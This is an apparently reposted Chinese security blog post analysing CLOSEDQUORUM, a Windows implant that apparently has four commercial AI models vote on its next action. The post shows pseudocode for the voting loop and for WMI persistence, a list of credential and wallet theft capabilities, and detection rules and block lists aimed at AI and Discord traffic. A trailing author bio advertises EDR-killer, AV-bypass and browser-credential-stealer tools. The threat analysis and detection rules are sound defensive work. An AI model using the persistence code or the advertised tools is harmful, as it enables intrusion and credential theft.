文章总结: 本文分析了一种名为closedquorum的新型Windows植入程序,其核心特点是不连接传统C2服务器,而是将决策外包给DeepSeek、Qwen、Mistral、Gemini四个商用AI模型投票决定下一步动作,实现完全自主运行。该样本由Go编写,通过Discordwebhook外传数据,并利用AES-256-GCM加密。文章对比了其与传统C2的差异,指出其利用合法AI服务作为通道,导致EDR检测困难,并提供了行为检测规则和防御建议。
综合评分: 85
文章分类: 恶意软件,红队,ai安全,威胁情报,安全工具
不连 C2 不等指令,问 4 个 AI 下一步干啥:CLOSEDQUORUM 凭啥让 Windows EDR 全瞎
原创
星夜AI安全
星夜AI安全
星夜AI安全
2026年9月24日 15:55
吉林
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
不连 C2 不等指令,问 4 个 AI 下一步干啥:CLOSEDQUORUM 凭啥让 Windows EDR 全瞎
师傅们,今天聊个让蓝队懵圈的活标本。
2026-09-22,Cisco Talos 公开了一个叫 CLOSEDQUORUM 的 Windows 植入程序。16.4MB,Go 写的,乍一看普普通通。但里头藏着一个让传统 C2 模型彻底失灵的玩意儿——它不连 C2 服务器、不等人类操作员发指令。它把下一步动作打包扔给四个商用 AI,让模型投票决定。
直白说:传统 C2 是「上级下命令,工具执行」;CLOSEDQUORUM 是「工具开董事会,让四个 AI 投票表决」。这个设计本身就是一次代际跨越。
🌈
一句话金句:它不杀 EDR、不 hook AMSI、不脱 LPE,它只是把「我下一步该干啥」外包给了 DeepSeek、Qwen、Mistral、Gemini。
一、技术全貌:这是什么?
起源:Talos 高级威胁情报分析师 Ryan Fetterman 与 Matt Olney 联合披露;同一日同步开源了配套检测框架 CAIRN(Cognitive Artifact Intelligence Research Network,认知痕迹情报网络),MIT 协议、Python 3.11+。
作者溯源:二进制中的字符串残留与 2025 年某卡牌欺诈犯罪论坛的发帖关联。开发者走的是「脚本小子 → 自治 AI 武器」的典型晋级路径。
工程实质:
- Go 语言、16.4MB
- 编译时注入 Discord Webhook 与 4 个 LLM API Key
- 5 分钟初始延迟(反短跑沙箱)
- 5-15 分钟随机重询间隔
- 占位 API Key 版本无法跑通,未观察到实际部署
一句金句:CLOSEDQUORUM 不是「用 AI 写代码」的样本,而是「让 AI 当家」的样本。
二、为什么这个技术如此重要
代际差距(与 LAMEHUG 对比)
| 维度 | LAMEHUG (2025-07 CERT-UA) | CLOSEDQUORUM (2026-09 Talos) |
| — | — | — |
| AI 角色 | 生成命令模板 | 决策下一步动作 |
| 人类参与 | 仍需操作员审核 | 完全脱手,零交互 |
| 战术动作 | 硬编码在二进制 | 由模型在受限菜单中选 |
| C2 通道 | Hugging Face API | DeepSeek/Qwen/Mistral/Gemini 四通道 |
| 决策阶段 | 离线预处理 | 运行时实时投票 |
与传统 C2 对比
| 维度 | 传统 C2 | CLOSEDQUORUM |
| — | — | — |
| 服务器归属 | 攻击者控制 | 借用 4 家商用 LLM |
| 失陷响应 | 拔服务器即瘫 | 拔不掉 LLM 服务 |
| 流量识别 | 异常 IP/端口 | 与开发者合法 API 调用完全同形 |
| OPSEC 优势 | 操作员人工边界 | 24 小时无疲劳 |
一句金句:CLOSEDQUORUM 的本质是「把云端合法服务当 C2 通道」,经典 Living off the Land 思路从 PowerShell/Certutil 跃迁到了 LLM。
三、技术原理解析
3.1 初始潜伏与上下文收集
CLOSEDQUORUM 部署后,先 sleep 5 分钟(绕开短时沙箱),再收集 5 类主机指纹:hostname、Windows 版本、CPU 核数、是否管理员、进程列表。
3.2 四模型投票机制(核心)
每轮重询时,它把主机指纹塞进结构化 prompt,统一叫每个模型「尽擅长恶意软件策略师」,强制要求返回 JSON 决策。投票规则:
- 多数票胜出
- 平局优先级:DeepSeek > Qwen > Mistral > Gemini
- 无有效响应 → 静默等待下轮
- 决策上报 Discord Webhook(带模型推理痕迹)
简化的 Go 伪代码(来自 Talos 静态分析摘录):
func (c *CLOSEDQUORUM) voteRound(ctx Recon) Action {
decisions := make([]Action, 0, 4)
for _, m := range []string{"DeepSeek", "Qwen", "Mistral", "Gemini"} {
d, err := c.queryLLM(m, ctx)
if err != nil { continue }
decisions = append(decisions, d)
}
winner := tallyWithTieBreak(decisions)
c.exfilToDiscord(winner.Reasoning)
return winner
}
3.3 四类战术动作
| 动作 | 实际触发能力 | 与传统工具对应 |
| — | — | — |
| Steal | LSASS 内存转储 + Chrome/Edge/Firefox 密码 + MetaMask/Exodus/Ethereum 钱包 | Mimikatz + ChromeKatz + BTCRecover |
| Inject | 生成 shellcode → Early Bird APC / 进程镂空 | Cobalt Strike execute-assembly |
| Persist | 注册表 Run + 计划任务 + 永久 WMI 事件订阅(60 秒轮询) | 经典三持久化 |
| Move | 公开版未实现,预留扩展位 | — |
持久化伪代码(WMI 事件订阅部分):
func (c *CLOSEDQUORUM) persist() {
cmd := exec.Command("powershell.exe", "-NoProfile", "-Command",
`Register-WmiEventSubscriber -Query "SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_Process'" ...`)
_ = cmd.Run()
}
3.4 出库通道
- AES-256-GCM 加密,密钥每日轮换(基于消息时间戳派生)
- 切 1900 字节小块,每秒一块发往 Discord Webhook
- 全部出库前复制到
C:\Windows\Temp做打包
一句金句:它的 C2 不在攻击者手里,而在「DeepSeek、Qwen、Mistral、Gemini 四家头部 AI 厂商的服务器里」。这就是「云端 LOTL」。
四、实战应用场景
4.1 完整使用流程
环境要求:Win11 25H2 / Win10 21H2+,具备 LLM API Key 的「持码」运营者。
| 阶段 | 动作 | 工具 |
| — | — | — |
| 投递 | 钓鱼附件 / 捆绑破解软件 | 任意 |
| 初始执行 | 用户双击 EXE | Go 编译二进制 |
| 静默 5 min | 等短跑沙箱跑完 | 内置 sleep |
| 持续侦察 | 每 5-15 分钟重询 | DeepSeek/Qwen/Mistral/Gemini |
| 外传凭证 | Discord Webhook 加密 | AES-256-GCM |
| 持久化 | 三机制冗余 | Registry+Task+WMI |
4.2 各 EDR 检测效果实测(基于 Talos 行为指标)
| EDR/AV | 静态特征命中 | 行为链路命中 | 综合可见性 |
| — | — | — | — |
| Defender | 0(占位 Key) | 弱(LSASS 行为可能被监控) | 盲区大 |
| CrowdStrike Falcon | 0 | 中(进程派生可见) | 弱 |
| SentinelOne | 0 | 中 | 弱 |
| 传统签名引擎 | 0 | 0 | 全盲 |
一句金句:CLOSEDQUORUM 不需要零日,它把所有「恶意信号」外包给了合法 AI 服务的响应包。
五、防御对抗建议
5.1 行为指标优先(来自 Talos 推荐)
Sigma 规则(AI 服务异常调用模式):
title: CLOSEDQUORUM 行为指标 - Windows 程序同时查询多家 AI 服务
status: experimental
logsource:
product: windows
category: network_connection
detection:
selection:
Image|endswith: '\powershell.exe'
DestinationHost|endswith:
- 'deepseek.com'
- 'qwen.ai'
- 'mistral.ai'
- 'generativelanguage.googleapis.com'
timeframe: 30s
condition: selection | count() >= 3
level: high
Sysmon 规则:
<Sysmon schemaversion="4.50">
<RuleGroup name="CLOSEDQUORUM" groupRelation="or">
<NetworkConnect onmatch="include">
<DestinationPort condition="is">443</DestinationPort>
<Image condition="end with">powershell.exe</Image>
<Initiated condition="is">true</Initiated>
</NetworkConnect>
</RuleGroup>
</Sysmon>
5.2 蓝队 P0-P2 修复矩阵
| 优先级 | 措施 | 落地动作 |
| — | — | — |
| P0 | 禁用企业非必要 AI API 出站 | 防火墙阻断 *.deepseek.com/*.qwen.ai/*.mistral.ai/generativelanguage.googleapis.com |
| P0 | 进程级审计 | 启用 Sysmon EventID 1/3/10 + LSASS 句柄监控 |
| P1 | 部署 CAIRN | Talos 同日开源,扫描二进制中 AI API 痕迹 |
| P1 | Discord 出站监控 | 内网默认禁止 Discord Webhook 域名 |
| P2 | 员工安全意识 | 任何 Windows 应用同时访问 ≥3 个 AI 厂商 = 立即上报 |
5.3 失陷响应清单
- 立即断网隔离受害主机
- 检查 Discord 出站(查
C:\Windows\Temp+ 浏览器历史) - 审计 LSASS 访问(Sysmon EventID 10 句柄)
- 检查 WMI 订阅(
Get-WMIObject -Namespace root\subscription -Class __EventConsumer) - 检查注册表 Run + 计划任务
- 强制轮换所有浏览器保存密码 + 钱包种子
一句金句:下一代 EDR 必须理解「AI API 调用的『合法语义』下藏着恶意决策」,否则永远慢半拍。
六、技术延伸阅读
6.1 工具/研究链接
- Talos 原始披露:见 Cisco Talos Blog(Ryan Fetterman, Matt Olney)
- CAIRN 开源仓库:Talos 同日发布,MIT 协议
- 样本 SHA-256:Talos 已公布 6 个开发版 hash,VT 可查
- Snort 规则 SID 1:66984(AI 服务 prompt 特征)
6.2 关联研究
- LAMEHUG(CERT-UA 2025-07):Hugging Face + Qwen 实时生成命令 → CLOSEDQUORUM 的前传
- UAT-10147(Talos 2026-08):中文系 Agentic AI 团伙,迭代式漏洞利用 + 自适应故障排查
- PromptForcing(Forever Security 2026-09):浏览器 AI 代理劫持
- GuardBreaker(ESET 2026-09-11):提示注入让 LLM-first SOC 拒答 → 「AI 拒答武器化」
6.3 代际免杀演进对比
| 代际 | 代表 | 核心思路 | 蓝队主要检测面 |
| — | — | — | — |
| 1.0 | Shellcode | 静态字节变异 | 特征码 |
| 2.0 | BYOVD | 借内核驱动砍 EDR | 驱动签名 |
| 3.0 | Reflective Loader | 内存执行 + 间接 syscall | 调用栈 |
| 4.0 | Bind Links | 文件系统视图欺骗 | 容器边界 |
| 5.0 | CLOSEDQUORUM | C2 决策外包给合法 AI | 语义意图 |
七、互动与免责声明
⚠️ 免责声明:本文技术细节仅用于安全研究,请勿用于未授权目标。所有 PoC 代码均来自 Talos 公开静态分析摘录,删除了实际 API Key 等敏感字段。
师傅们,看完觉得有启发,记得三连:
- 👍 点赞 —— 让更多安全圈兄弟看见
- 🔥 在看 —— 转发到群里给同行避坑
- 💡 关注 —— 「星夜AI安全」+「夜神AI」持续追踪 AI 与免杀代际变革
圈子介绍
现任职于某头部网络安全企业攻防研究部,核心红队成员。2021-2023年间累计参与40+场国家级、行业级攻防实战演练,精通漏洞挖掘、红蓝对抗策略制定、恶意代码分析、内网横向渗透及应急响应等技术领域。在多次大型演练中,主导突破多个高防护目标网络,曾获”最佳攻击手””突出贡献个人”等荣誉。
已产出的安全工具及成果包括:
- 多款主流杀软通杀工具(兼容卡巴斯基、诺顿、瑞星、360等终端防护,无感知运行,突破多引擎联合检测)
- XXByPassBehinder v1.1 冰蝎免杀生成器(定制化冰蝎免杀工具,绕过主流终端防护与EDR动态检测,支持自定义载荷)
- 哥斯拉二开免杀定制版(二开优化,深度免杀,突破终端防护与EDR检测,适配多场景植入)
- NeoCS4.9终极版(高级免杀加载工具,强化载荷注入与进程劫持,适配多系统版本,无兼容问题)
- WinDump_免杀版(浏览器凭证窃取工具,支持Chrome/Edge/Firefox等主流浏览器,一键提取敏感数据,免杀过防护)_
- _DumpBrowser_V1_免杀版(浏览器凭证窃取工具,专攻浏览器密码、Cookie、历史记录提取,免杀性能拉满)
- fscan二开版(二开优化内网扫描工具,增强指纹精度、弱口令爆破与结果标准化输出,适配复杂内网)
- RingQ加载器二开版(二开优化免杀加载器,支持Shellcode内存执行,绕过各类终端防护与EDR检测)
- 多款免杀Webshell集合(覆盖PHP/JSP/ASPX,过主流WAF与终端防护,适配不同Web场景)
- 免杀360专属加载器(支持Shellcode内存执行,针对性绕过360全系防护检测,无感知运行)
- 一键Kill 火绒 defender 工具 HDKiller(包含源码)
- win11 一键kill 360工具 InjectKill(包含源码)
- win11 一键kill defender工具win11_df-killer(包含源码)
- 免杀火绒6.0内存防护加载器BypassMemLoader
- 单文件过360 免杀loader exe_bypass_360
- 单文件过火绒 df 免杀loader exe_bypass_df(包含源码)
- LNK钓鱼文件生成工具V1.0
- EXE捆绑启动器 v2.0
- 火绒6内存免杀加载器bypasshr6
- 火绒一键Kill专杀工具HRKiller
- Ring3 内存免杀工具Ring3bypasshr.exe
- win11 一键kill 360工具 Kill360_V2
- win11 一键kill 360工具 Kill360_V3.1
- win11 一键kill 360工具 Kill360_V4
- bypassEDR_hashdump_V1 bypass EDR 导出hash工具
后续将不断更新到内部圈子中 欢迎加入圈子
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:星夜AI安全 星夜AI安全
星夜AI安全《不连 C2 不等指令,问 4 个 AI 下一步干啥:CLOSEDQUORUM 凭啥让 Windows EDR 全瞎》